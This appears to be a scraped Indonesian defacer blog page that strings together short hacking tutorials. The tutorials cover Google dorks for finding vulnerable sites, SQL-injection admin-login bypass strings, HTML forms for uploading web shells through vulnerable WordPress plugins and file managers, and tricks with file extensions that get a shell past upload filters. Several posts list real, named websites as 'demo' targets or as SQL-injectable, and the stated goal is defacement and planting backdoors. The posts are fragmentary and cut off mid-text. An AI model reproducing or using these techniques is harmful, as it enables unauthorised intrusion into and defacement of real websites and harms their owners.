Alwdy

# author : Mr.Luciferz # contact : fb.com/mr.luciferz # inurl:/daftar.php "Choose File" # inurl:"/uploads/dokumen/" site:go.id # sh00tz : ● Con7ext - Jembrix - Kakatoji - Ashura - grav3 ● # HentaiC0de - IndoXploit - All Defacer Indonesian ###################################################

# author : Mr.Luciferz # contact : fb.com/mr.luciferz # intitle:"IndoXploit" filetype:php # intitle:"IndoXploit" intext:"public_html" filetype:php # intitle:"IndoXploit" intext:"mass deface" filetype:php # intitle:"IndoXploit" intext:"mass delete" filetype:php # intitle:"IndoXploit" intext:"jumping" filetype:php # intitle:"IndoXploit" intext:"config" filetype:php # intitle:"IndoXploit" intext:"config" filetype:php # intitle:"IndoXploit" intext:"fake root" filetype:php # intitle:"IndoXploit" intext:"auto edit user" filetype:php # intitle:"IndoXploit" intext:"Auto Edit Title WordPress" filetype:php # intitle:"IndoXploit" intext:"WordPress Auto Deface" filetype:php # intitle:"IndoXploit" intext:"WordPress Auto Deface V.2" filetype:php # intitle:"IndoXploit...

# contact : fb.com/mr.luciferz # Dork : inurl:/viewAdministrators.action # "filetype:action site:*.id" # intitle:Bamboo administrators intext:Bamboo administrators filetype:action # sh00tz : ● Con7ext - Jembrix - Kakatoji - Ashura - grav3 ● # HentaiC0de - IndoXploit - All Defacer Indonesian ##############################################################

# author : Mr.Luciferz # contact : fb.com/mr.luciferz # home : http://www.phpjabbers.com/ # Dork : Copyright © 2017 PHPJabbers.com intitle:Stiva Blog Script by PHPJabbers.com # intitle:Yellow Pages Script by PHPJabbers.com intext:ADMIN LOGIN # intitle:Member Login Script by PHPJabbers.com intext:ADMIN LOGIN # intitle:Knowledge Base Builder script by PHPJabbers.com intext:ADMIN LOGIN # intitle:Simple CMS | Login intext:ADMIN LOGIN # PHP Scripts Copyright © 2017 StivaSoft Ltd # inurl:content/index.php? intext:ADMIN LOGIN # inurl:/SimpleCMS intext:ADMIN LOGIN # inurl:webCMS/index.php? intext:ADMIN LOGIN # inurl:/visualVerge-Programs/webCMS/ # Powered by Sytek intext:ADMIN LOGIN # inurl:/app/web/img/ # inurl:/app/web/upload/files/ # ------------------------------------------------------------------------------------------------------------ # BUG : /core/third-party/filemanager/dialog.php # Result : /app/web/upload/tinymce-source/shell.php.accdb # Notice : Remember! Upload Shell with ...

# author : Mr.Luciferz # contact : fb.com/mr.luciferz # intitle:"Index Of/am/revslider" # intitle:"Index Of/be/revslider" # intitle:"Index Of/il/revslider" # intitle:"Index Of/tr/revslider" # intitle:"Index Of/ro/revslider" # intitle:"Index Of/ca/revslider" # intitle:"Index Of/ge/revslider" # intitle:"Index Of/ba/revslider" # intitle:"Index Of/sy/revslider" # intitle:"Index Of/fi/revslider" # intitle:"Index Of/rs/revslider" # intitle:"Index Of/revslider # sh00tz : ● Con7ext - Jembrix - Kakatoji - Ashura - grav3 ● # HentaiC0de - IndoXploit - All Defacer Indonesian #################################################

# author : Mr.Luciferz # contact : fb.com/mr.luciferz # Dork : inurl:/media/source/ site:.id # BUG : /plugin/filemanager/dialog.php # ----------------------------------------- # Dork : inurl:/fm/source/ # BUG : /fm/filemanager/dialog.php # ----------------------------------------- # Dork : inurl:/clients/source/ ext:jpg # inurl:/clients/gallery/ ext:jpg # inurl:/clients/news/ ext:jpg # inurl:/assets/picture/ ext:jpg # inurl:/clients/channel/ ext:jpg # inurl:/clients/portfolio/ ext:jpg # inurl:/clients/banner/ ext:jpg # BUG : /assets/backend/tinymce/plugins/filemanager/dialog.php # /assets/files/plugins/filemanager/filemanager/dialog.php # --------------------------------------------------------- # Dork : Index of inurl:/source/ intext:source.txt # Notice : Remember! Upload Shell with ext php.fla / php.ndsfx / php5 / php.accdb / php.doc # sh00tz: ● Con7ext - Jembrix - Kakatoji - Ashura - grav3 ● # Thank's To For Exploit Khunerable # HentaiC0de - IndoXploit - Indonesian Hacker Rulez...

# contact : fb.com/mr.luciferz # BUG : /wp-content/themes/pronto/cjl/pronto/uploadify/check.php # /wp-content/plugins/1-flash-gallery/upload.php # /wp-content/themes/zcool-like/uploadify.php # /third-party/uploadify/uploadify.php # /lib/uploadify/custom.php # /wp-content/plugins/html5avmanager/lib/uploadify/custom.php # /wp-content/plugins/wp-property/third-party/uploadify/uploadify.php # /wp-content/plugins/squace-mobile-publishing-plugin-for-wordpress/uploadify.php # /wp-content/plugins/1-flash-gallery/js/uploadify/uploadify.php # /wp-content/themes/aim-theme/lib/js/old/uploadify.php # /wp-content/plugins/annonces/includes/lib/uploadify/uploadify.php # /wp-content/plugins/apptivo-business-site/inc/jobs/files/uploadify/uploadify.php # /wp-content/plugins/bulletproof-security/admin/uploadify/uploadify.php # /wp-content/plugins/chillybin-competition/js/uploadify/uploadify.php # /wp-content/plugins/comments_plugin/uploadify/uploadify.php # /wp-content/plugins/wp-crm/third-party/uploadify...

====================================================== # Exploit Title: Withs Technosolutions Admin Login bypass # Dorks : "Design by Withs Technosolutions" # Date: 2017-06-07 # Author: Codename # Vendor : http://www.withstechnosolutions.in/ ====================================================== Tutorial: [+] Dorking di google  [+] Buka target [+] Masukan username & password  [+] Username: '=''OR' Atau admin [+] Password: '=''OR' Atau admin ====================================================== Admin Page : sitetarget.com/admin/login.php Atau    sitetarget.com/admin/login.aspx ====================================================== Upload Your Backdoors Or Script Html

Dork: inurl:/wp-content/themes/[u/design OR u-design ] Exploit Title : WordPress Themes U-design File Upload Author : Mohammad peywasteh Tested : Win10 ------------------------------------------- Dork: inurl:/wp-content/themes/u-design   << Klik >> Google Dork : inurl:/wp-content/themes/[u/design OR u-design ] Exploit : https://localhost/ wp-content/themes/[u/design OR u-design ]/scripts/admin/uploadify/uploadify.php Vulnerability : Exploit Page  PoC : <form method="POST" action="https://localhost/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php" enctype="multipart/form-data"> <input type="file" name="Filedata" /> <button>Upload!</button><br/> </form> Klik >>  https://ghostbin.com/paste/ov2md File Access : https://localhost/patch/shell.php

Malam Gan.. Gimana Puasanya Lancar kan ??? " Deface nya Lancar , Puasanya Bolong2 :D " Malam ini Ane mau share Tutor Deface Admin Login Bypass WTS Technologies. Simak Yak. Dorks nya :  "Powered by WTS Technologies" Admin page nya ada di :  www.sitetarget.com/console/ Username & Password : '=' 'OR'  Dan Gw langsung Masuk admin panel nya... udah gt tinggal cari Uploader buat upload Backdoor nya. Gw coba Upload disitu..  Oke berhasil... inget ya Ga usah tebas2 index dehh.. Kalo ga di Backup mah :D Sekian sampe Ketemu lagi di Tutorial selanjutnya.. Greetz : - x404.hz - Trenggalek6etar -  Lunatic0de -   XnonGermx - nginxDEX - Vcry - StuxN3t - Kerens_id - Fx106 - Magelang6etar & All indonesia Defacer

[+] Title : WordPress Revslider Exploit and Mass Shell Upload [+] Author : Fir3 H@wk [+] Tested on: Windows & Linux [+] Software : Perl [+] Video Link : https://www.youtube.com/watch?v=fznBn2JQ4VE ######################  # [+] DESCRIPTION :  ######################  [+] Dork: inurl:/wp-content/plugins/revslider/ [+] Exploit: Code Download Link: http://www.mediafire.com/file/t3dwgp45ioma3cg/exploit.rar [+] If you face any problem you can watch this video  Video 

Selamat malam Penggemar... ☻ Terima Kasih Buat  Semua Defacer di tanah air yang udah bantu share ni Blog. Oke sekarang gw bakal share Metode Deface Adminpage Bypass with Noredirect. yang sebelumnya gw juga udah pernah share disini  Deface Dengan admin page Desenvolvimento MW Way [No Redirect] Bahan Yang harus di persiapkan , Addons mozilla download DISINI Langsung Search di google.. Dorks : "Website design by Upshot Media Ltd" Buka web : Sitetarget.com/admin/ Setelah itu langsung buka Addons No redirect Lalu Copas  Sitetarget.com/admin/ langsung klik OK . Buka lagi Sitetarget.com /admin/home.php  Kalo vuln Tanpa Username & Password elo langsung masuk ke panel admin nya.. Tinggal upload Backdoors dah.... Demo :  http://www.edwinsinstallations.co.uk/admin/ http://www.blanquette.co.uk/admin/ http://www.plesheyforgeltd.co.uk/admin/ http://www.oaktubs.com/admin/ http://www.eastcoastminiclub.co.uk/admin/ Note :  Sayangnya di beberapa Site, Gw liat ga ada...

Halo gaess.... Gw mw Share Tutor Buat yang mau belajar deface. :D Yok langsung Baca tutor nya. Dorks 1 : "Powered by Ofek Technologies" Dorks 2 : "Designed By  Ofek Technologies" Home Admin : sitetarget.com/index.php/admin/login.html Masukin username&password Username : '=' 'or' Password : '=' 'or' Okeh langsung cari tempat uploader.. Buat upload Backdoors :D GoodLuck Gaees ! Demo :  http://www.globalhotelsforsale.com/ http://www.nairswedding.in/ http://www.geovinsolutions.com/ http://www.sja.org.in http://www.syaa.in http://www.se7en.co.in/ Titip Gans "MagelangNoobsHackers"  ..... zueheehe.....

Halo Ganteng... Langsung ke tutorial  ############################## # Exploit Title : Lcnt Team Shell Upload Vulnerability # Exploit Author : xBADGIRL21 # Dork : CopyRight 2006-2017 温州龙诚互联科技有限公司 Lcnt Team # Vendor : http://icnt.net # Tested on: [WIN7] ###################### # [+] Poc : ###################### # [!] Exploit : http://target.com/admin/pic_add.php?Element=shopspic # [!] Shell Path : http://target.com/admin/lcnt/[RANDOM_NUMBER].php ###################### # Discovered by : xBADGIRL21 Setelah Dapet target.. Langsung Exploit pake www.target.com / admin/pic_add.php?Element=shopspic Langsung upload Shell. nanti di sebelah kiri bakal nemu link untuk akses shell backdoornya. Berarti akses shell gw ada di www.target.com /admin/lcnt/1491924141.php Daann Jebret... Terserah mau di apain.. :D [!] Live Demo : http://www.chinaomay.com http://bisco.net.cn http://www.wzican.com http://www.raxinte.com video 

Posted by CxSecurity [+] Title : WordPress Gravity Forms Plugin Exploit and File Upload [+] Author : Fir3 H@wk [+] Tested on: Linux and Windows [+] Software : Perl [+] Video Link : https://www.youtube.com/watch?v=Nz3yUPFrmF8 ######################  # [+] DESCRIPTION :  ######################  [+] Dork: inurl:/wp-content/plugins/gravityforms/ inurl:/wp-content/uploades/gravity_forms/ [+] Exploit: Code Download Link: http://www.mediafire.com/file/3xftnc6pufq9njz/exploit.rar [+] If you face any problem you can watch this video  Video Link: https://www.youtube.com/watch?v=Nz3yUPFrmF8

Halo Sobat Apakabar? Langsung menuju tutor.. Elu Langsung menuju ke google. DORKs  "inurl:/wp-content/plugins/wp-dreamworkgallery" Pilih Salah Satu Website.  Copas Exploit ini di notepad lalu save ex. html : <form action="http:// www.target.com //wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form> www.target.com di isi sama web target... Contoh ini target gw <form action="http:// theatredumordant.fr //wp-admin/admin.php?page=dream...

Share Gan tutor Admin Page bypass... Belajar baca tutor yak. *************************************************** # Exploit Title: Techizas Infotech Admin login bypass # Google Dork: "Design by Techizas Infotech Pvt. Ltd" # Date: 1/04/2017 # Author: Codename @MagelangNoobs # Facebook: https://www.facebook.com/magelangnoobs.phtml # Tested on: Win *************************************************** [+] Dorking di google pakai dork diatas [+] Open target [+] Masukkan username & password [+] Username: '=''OR'  [+] Password: '=''OR' [+] Jika username menggunakan email pakai  ''=''OR'@mail.com *************************************************** DEMO :  http://jnvbegusarai.org/admin/ CXsecurity Post :  https://cxsecurity.com/issue/WLB-2017040002

################################################################################# # Wordpress Themes betheme Sh3ll Upload Vulnerability | CSRF # Author : Turk@Xtra # Google Dork: inurl:/wp-content/themes/betheme/ # Date:2017-03-13 # Tested on: Win 7, Linux ################################################################################# # [!] Exploit : http://127.0.0.1/wp-content/themes/betheme/muffin-options/fields/upload/field_upload.php # [!] File Location : http://127.0.0.1//wp-content/themes/betheme/muffin-options/fields/upload/Files/shell.php ################################################################################# #[*] CSRF: ################################################################################# <html> <body> <form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/betheme/muffin-options/fields/upload/field_upload.php" method="post"> Your File: <input name="files[]" type="file...

Post by https://cxsecurity.com *************************************************** # Exploit Title: Bypass Admin login Versatile Software Services # Google Dork: intext:POWERED BY Versatile Software Services # Date: 21.03.2017 # Vendor Homepage: http://www.vsspl.co.in/ # Tested on: Kali Linux, Win8 x64,  # Exploit Author: Mkali07 # Author Mail : Mkalim07@protonmail.com # Mkali07 ************************************* Tested site: http://jpskymahavidyalaya.org/alogin.aspx http://www.tprs.in/alogin.aspx http://snvmpgcollege.com/alogin.aspx ,..... *************************************************** Bypass login: http://site.com/alogin.aspx User ==> 'or''=' Pass ==> 'or''=' *************************************** Good Luck!

Malam Gan ini nih gw mau Share lagi Web vuln SQLi . kalo mau liat Post ane yg sebelum nya  bisa cek di  Kumpulan Site Vuln SQL 2017 - Bag.2 New ! Site Vuln SQL 2017 Cara nya Deface gimana? Cek disini  Tutorial SQLi Manual + Admin Finder http://www.metasofsda.in/School/index.php?id=44%27 https://www.athenainfonomics.in/career_description.php?id=14%27&title=full%20time&return=53 http://myimpact.impactmeasurement.co.in/clipj_admin.php?id=da29a445f9%273793b1bde09b4fd230bc61 http://www.teluguproperties.co.in/sellerdetail.php?id=15%27 http://www.pdrungta.co.in/utility.php?id=10%27 http://www.arb-bearings.com/content.php?id=2%27 http://www.mits-india.org/vision.php?id=1%27 http://www.kreativindia.biz/works.php?id=52%27 http://heteroworld.com/view_news.php?id=455%27 http://www.fieo.org/view_section.php?id=0,34,551%27 http://www.sankalpa.it/ita/india.php?id=100%27 http://www.goafilms.com/location.php?id=1%27 https://www.brudirect.com/news.php?id=17516%27 http://www.granium...